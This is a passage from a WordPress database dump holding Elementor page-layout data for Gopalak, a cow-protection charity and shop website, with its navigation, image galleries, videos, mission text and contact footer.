here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9931,1665,'_elementor_page_assets','a:0:{}'),(9933,1666,'_elementor_edit_mode','builder'),(9934,1666,'_elementor_template_type','wp-page'),(9935,1666,'_elementor_version','3.7.8'),(9936,1666,'_wp_page_template','elementor_canvas'),(9937,1666,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"9\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9938,1666,'_elementor_page_assets','a:0:{}'),(9940,1667,'_elementor_edit_mode','builder'),(9941,1667,'_elementor_template_type','wp-page'),(9942,1667,'_elementor_version','3.7.8'),(9943,1667,'_wp_page_template','elementor_canvas'),(9944,1667,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":